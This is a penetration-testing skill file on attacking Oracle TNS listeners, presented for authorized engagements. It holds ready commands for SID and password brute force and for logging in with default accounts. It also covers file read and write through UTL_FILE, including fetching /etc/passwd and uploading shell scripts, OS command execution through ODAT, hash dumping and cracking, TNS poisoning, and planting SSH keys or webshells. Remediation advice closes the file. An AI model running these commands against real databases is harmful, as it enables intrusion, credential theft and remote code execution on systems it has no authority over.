pentesting-oracle

$npx mdskill add xalgord/xalgorix/pentesting-oracle

- Default `1521/tcp` (TNS Listener); secondary listeners commonly on `1522-1529`, legacy on `1748`. - Banner like `Oracle TNS Listener 9.2.0.1.0`; the listener is the entry point — you must learn a **SID/service name** before authenticating. - Use when `nmap` shows `oracle-tns`, when you have recovered DB account creds, or to abuse the listener (older versions allow remote control / poisoning).

SKILL.md

.github/skills/pentesting-oracleView on GitHub ↗
---
name: pentesting-oracle
description: Testing Oracle Database via the TNS Listener (default ports 1521, plus secondary listeners 1522-1529) for SID disclosure/bruteforce, default and weak account credentials, TNS listener misconfiguration and poisoning, and ODAT-driven file read/write and OS command-execution primitives during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- database
- oracle
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting Oracle TNS Listener (port 1521)

## When to Use
- Default `1521/tcp` (TNS Listener); secondary listeners commonly on `1522-1529`, legacy on `1748`.
- Banner like `Oracle TNS Listener 9.2.0.1.0`; the listener is the entry point — you must learn a **SID/service name** before authenticating.
- Use when `nmap` shows `oracle-tns`, when you have recovered DB account creds, or to abuse the listener (older versions allow remote control / poisoning).

## Quick Enumeration
```bash
# Version
nmap --script oracle-tns-version -p1521 -sV <IP>
nmap --script "oracle-sid-brute" -p1521 <IP>          # discover SIDs

# All-in-one with ODAT (the primary Oracle pentest tool)
./odat-libc2.12-x86_64 all -s <IP> -p 1521

# SID + credential brute via ODAT
./odat sidguesser -s <IP> -p 1521
./odat passwordguesser -s <IP> -p 1521 -d <SID> --accounts-file accounts.txt

msfconsole -q -x 'use auxiliary/scanner/oracle/sid_enum; set RHOSTS <IP>; run; exit'
```

## Critical: Checks Most Often Missed
- **SID/service name disclosure** — without a SID you cannot log in; older listeners disclose it, otherwise brute force it.
  - How to CONFIRM: `nmap --script oracle-sid-brute -p1521 <IP>` or `./odat sidguesser -s <IP>` returns a SID (e.g. `XE`, `ORCL`, `PLSExtProc`).
- **Default / weak account credentials** — Oracle ships many well-known accounts: `system:manager`, `sys:change_on_install`, `scott:tiger`, `dbsnmp:dbsnmp`, `outln:outln`, `system:oracle`.
  - How to CONFIRM: `sqlplus system/manager@<IP>:1521/<SID>` connects, or `./odat passwordguesser` reports valid pairs.
- **TNS listener with no password / TNS poison (CVE-2012-1675)** — an unauthenticated listener can be queried/reconfigured; TNS poisoning lets an attacker register a rogue instance and MITM sessions.
  - How to CONFIRM: `tnscmd10g status -h <IP>` returns listener details without a password; check listener version against CVE-2012-1675.
- **File read/write + OS command execution via ODAT** — with a valid DB account, abuse `UTL_FILE` (read/write files), external tables, `DBMS_SCHEDULER`/Java stored procedures (run OS commands), and `UTL_HTTP`/`UTL_TCP` for SSRF.
  - How to CONFIRM: `./odat utlfile -s <IP> -d <SID> -U <user> -P <pass> --getFile /tmp x /etc/passwd` retrieves a file; `./odat externaltable ... --exec ...` or `./odat dbmsscheduler ... --exec` runs a command.
- **Privilege escalation via PUBLIC/EXECUTE grants** — over-granted packages (`DBMS_*`) let low-priv users escalate to DBA.

## Workflow

### Step 1: Enumerate (version, SID, accounts)
```bash
nmap --script oracle-tns-version,oracle-sid-brute -p1521 <IP>
./odat sidguesser -s <IP> -p 1521
# Once a SID is known, fingerprint accessible accounts
./odat passwordguesser -s <IP> -p 1521 -d <SID> --accounts-file accounts.txt
```

### Step 2: Authenticate (default/weak creds, brute force)
```bash
# Native client (instantclient sqlplus)
sqlplus <user>/<pass>@<IP>:1521/<SID>
sqlplus system/manager@<IP>:1521/XE
# As SYSDBA
sqlplus sys/change_on_install@<IP>:1521/XE as sysdba

# Brute force
./odat passwordguesser -s <IP> -d <SID> --accounts-file /usr/share/oscanner/accounts.default
hydra -L users.txt -P passwords.txt <IP> oracle-listener   # or oracle-sid
nxc oracle <IP> --sid <SID> -u users.txt -p passwords.txt
```

### Step 3: Exploit / Extract (data dump + ODAT file/RCE primitive)
```sql
-- Native recon once connected
SELECT * FROM v$version;
SELECT username FROM all_users;
SELECT name, password, spare4 FROM sys.user$;       -- hashes (DBA)
SELECT table_name FROM all_tables;
```
```bash
# Arbitrary file READ / WRITE (UTL_FILE)
./odat utlfile -s <IP> -d <SID> -U <user> -P <pass> --getFile /etc x /etc/passwd
./odat utlfile -s <IP> -d <SID> -U <user> -P <pass> --putFile /tmp shell.sh ./shell.sh

# OS command execution
./odat externaltable -s <IP> -d <SID> -U <user> -P <pass> --exec /tmp run.sh
./odat dbmsscheduler -s <IP> -d <SID> -U <user> -P <pass> --exec "/bin/bash -c 'id'"
./odat java        -s <IP> -d <SID> -U <user> -P <pass> --exec "id"

# Upload + run a reverse shell payload end to end
./odat all -s <IP> -d <SID> -U <user> -P <pass>
```

### Step 4: Post-access / privilege escalation / pivot
- Dump `sys.user$` password hashes (Oracle 10g DES, 11g SHA-1 `spare4`) and crack with Hashcat (modes **3100** / **112**).
- Abuse over-granted `DBMS_*` packages or `CREATE ANY PROCEDURE`/`EXECUTE ANY` to reach DBA, then SYSDBA.
- Use `UTL_HTTP`/`UTL_TCP`/`UTL_INADDR` from the DB for SSRF / internal port scanning, and the DB host file-write to land SSH keys or webshells.
- Reuse recovered Oracle creds (often reused for `dbsnmp`, app accounts) against other services.

## Key Concepts
| Concept | Description |
|---------|-------------|
| **TNS Listener** | Network front-end on 1521 that routes clients to DB instances; must be queried for a SID. |
| **SID / Service name** | Identifier of a database instance required to authenticate (e.g. `XE`, `ORCL`). |
| **Default accounts** | Well-known creds (`system/manager`, `sys/change_on_install`, `scott/tiger`, `dbsnmp/dbsnmp`). |
| **TNS poisoning (CVE-2012-1675)** | Rogue instance registration on an unauthenticated listener enabling session MITM. |
| **UTL_FILE** | PL/SQL package for reading/writing files on the DB server. |
| **External tables / DBMS_SCHEDULER / Java SP** | PL/SQL mechanisms ODAT abuses for OS command execution. |
| **UTL_HTTP / UTL_TCP** | Outbound network packages enabling SSRF and internal scanning. |

## Tools & Systems
| Tool | Purpose |
|------|---------|
| **ODAT** | Oracle Database Attacking Tool — SID guess, password guess, UTL_FILE read/write, external-table/DBMS_SCHEDULER/Java command exec, `all` chain. |
| **sqlplus / instantclient** | Native client for authenticated queries and SYSDBA login. |
| **nmap NSE** | `oracle-tns-version`, `oracle-sid-brute`, `oracle-brute`, `oracle-enum-users`. |
| **Metasploit** | `scanner/oracle/sid_enum`, `tnscmd`, `oracle_login`, listener/version modules. |
| **netexec (nxc)** | `nxc oracle <IP> --sid <SID> -u .. -p ..` for auth/spraying. |
| **hydra** | Brute force `oracle-listener` / `oracle-sid` services. |
| **Hashcat / John** | Crack dumped `sys.user$` hashes (modes 3100 / 112). |

## Common Scenarios
### Scenario 1: SID brute → default creds → data dump
`oracle-sid-brute` reveals SID `XE`. `sqlplus system/manager@<IP>:1521/XE` connects with the default password, and the tester dumps application tables and `sys.user$` hashes.

### Scenario 2: Valid account → OS command execution
With a low-priv DB account, ODAT's external-table module writes a script to disk and executes it (`./odat externaltable ... --exec`), returning command output as the Oracle OS user.

### Scenario 3: Unauthenticated listener → poisoning
An old listener answers `tnscmd10g status` without a password and is vulnerable to CVE-2012-1675, allowing a rogue instance to be registered and client sessions to be intercepted.

## Output Format
```
## Oracle Finding

**Service**: Oracle TNS Listener
**Port**: 1521/tcp (Oracle 11g, SID=XE)
**Severity**: Critical
**Finding**: Default SYSTEM credentials enabling file read and OS command execution
**Evidence**:
  - nmap oracle-sid-brute -> SID "XE"
  - sqlplus system/manager@<IP>:1521/XE -> connected
  - ./odat externaltable -s <IP> -d XE -U system -P manager --exec /tmp id -> uid=54321(oracle)
**Impact**: Full database compromise plus OS command execution as the Oracle service account.
**Recommendation**:
  1. Change all default account passwords; lock/expire unused accounts (scott, dbsnmp, outln).
  2. Set a listener password and apply patches for CVE-2012-1675 (enable Valid Node Checking).
  3. Restrict 1521-1529 by firewall/source IP.
  4. Revoke EXECUTE on UTL_FILE / DBMS_SCHEDULER / Java from PUBLIC and least-privilege app accounts.
```

More from xalgord/xalgorix

SkillDescription
abusing-hop-by-hop-headersTesting proxies, load balancers, and CDNs for improper handling of HTTP hop-by-hop headers, where an
analyzing-macos-persistence-and-autostartEnumerating, planting, and hunting macOS persistence and auto-start (ASEP) locations during authorized
api-discoveryAPI endpoint discovery including OpenAPI/Swagger detection, hidden versioning, REST/GraphQL enumeration, and content negotiation
bypassing-binary-exploitation-mitigationsMethodology for identifying and defeating common binary hardening mitigations during authorized exploitation —
bypassing-captcha-protectionsIdentifying weaknesses in CAPTCHA implementations and bypassing them via replay, field removal,
bypassing-macos-gatekeeper-tcc-and-sipAssessing and bypassing macOS userland and platform security controls during authorized engagements -
bypassing-restricted-shellsEscaping restricted shells (rbash, rksh, lshell), chroot jails, and language sandboxes (Lua, Python)
bypassing-two-factor-and-otpIdentifying and exploiting flaws in two-factor authentication and one-time password verification
deepExhaustive security assessment with maximum coverage, depth, and vulnerability chaining
exploiting-ai-model-file-rceTesting machine-learning model files and model-loading services for remote code execution caused by insecure